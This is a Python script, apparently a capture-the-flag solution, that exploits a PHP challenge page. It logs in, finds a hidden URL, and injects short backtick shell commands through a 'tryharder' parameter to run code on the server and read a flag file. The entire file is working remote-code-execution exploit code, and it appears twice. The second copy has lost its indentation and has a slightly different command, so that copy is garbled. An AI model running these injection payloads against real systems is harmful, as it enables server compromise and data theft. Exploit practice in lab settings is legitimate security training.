stugmi/am-i-crazy.py

## am-i-crazy.py
#!/usr/bin/env python3.6

import requests
from rich import print
from rich.syntax import Syntax
from bs4 import BeautifulSoup
from sys import argv, exit


def print_code(code, lineRange: (int, int) = None):
    parser = BeautifulSoup(code, 'html.parser')
    code = Syntax(
        "".join(parser.find_all(text=True)).replace(
            "xd;\r", "\n").replace("1php", "<?php"),
        "php",
        background_color="default",
        line_numbers=True,
        line_range=lineRange
    )
    print(code)
    return code


def send_exec(cmd, lineRange: (int, int) = False):
    global secret
    req.post(target, data={"password": "dongs"*2})
    # Sending parms and writing to source_file
    payload = {"tryharder": cmd}
    req.get(secret, params=payload)
    print(f"[!] payload(len: {len(cmd)}): {cmd}")
    # Checking source again
    code = req.get(secret).text
    if lineRange:
        print_code(code, lineRange)


if __name__ == '__main__':
    global secret
    req = requests.Session()

    if len(argv) < 2:
        exit(print(f"Usage: {argv[0]} <target_address>",
                   "\n\nGet address from challenge page on:",
                   "\nhttps://app.cyberedu.ro/challenges/24a117a0-347e-11eb-b732-695350b7f49d/"
                   ))

    target = argv[1]
    if not target.startswith("http://"):
        target = "http://" + target

    resp = req.post(target, data={"password": "dongs"*2})
    secret = target + resp.text.split("'")[1]
    print(f"[!] Getting secret url: {secret}")

    # Writing to file through the file_put_contents in PHP code
    # Checking source after each request
    # Painfullly and slowly working around 15 character length limitation
    send_exec("${`ln -s /var`}")
    send_exec("${`mv var v`}")
    send_exec("${`ln -s v/w*`}")
    send_exec("${`mv www w`}")
    send_exec("${`ln -s w/h*`}")
    send_exec("${`mv html h`}")
    send_exec("${`cat */f*>f`}")

    # Finally getting answer
    send_exec("${print`cat f`}", (5,7))
	#!/usr/bin/env python3.6

	import requests
	from rich import print
	from rich.syntax import Syntax
	from bs4 import BeautifulSoup
	from sys import argv, exit


	def print_code(code, lineRange: (int, int) = None):
	parser = BeautifulSoup(code, 'html.parser')
	code = Syntax(
	"".join(parser.find_all(text=True)).replace(
	"xd;\r", "\n").replace("1php", "<?php"),
	"php",
	background_color="default",
	line_numbers=True,
	line_range=lineRange
	)
	print(code)
	return code


	def send_exec(cmd, lineRange: (int, int) = False):
	global secret
	req.post(target, data={"password": "dongs"*2})
	# Sending parms and writing to source_file
	payload = {"tryharder": cmd}
	req.get(secret, params=payload)
	print(f"[!] payload(len: {len(cmd)}): {cmd}")
	# Checking source again
	code = req.get(secret).text
	if lineRange:
	print_code(code, lineRange)


	if __name__ == '__main__':
	global secret
	req = requests.Session()

	if len(argv) < 2:
	exit(print(f"Usage: {argv[0]} <target_address>",
	"\n\nGet address from challenge page on:",
	"\nhttps://app.cyberedu.ro/challenges/24a117a0-347e-11eb-b732-695350b7f49d/"
	))

	target = argv[1]
	if not target.startswith("http://"):
	target = "http://" + target

	resp = req.post(target, data={"password": "dongs"*2})
	secret = target + resp.text.split("'")[1]
	print(f"[!] Getting secret url: {secret}")

	# Writing to file through the file_put_contents in PHP code
	# Checking source after each request
	# Painfullly and slowly working around 15 character length limitation
	send_exec("${`ln -s /var`}")
	send_exec("${`mv var v`}")
	send_exec("${`ln -s v/w*`}")
	send_exec("${`mv www w`}")
	send_exec("${`ln -s w/h*`}")
	send_exec("${`mv html h`}")
	send_exec("${`cat /f>f`}")

	# Finally getting answer
	send_exec("${print`cat f`}", (5,7))
No results found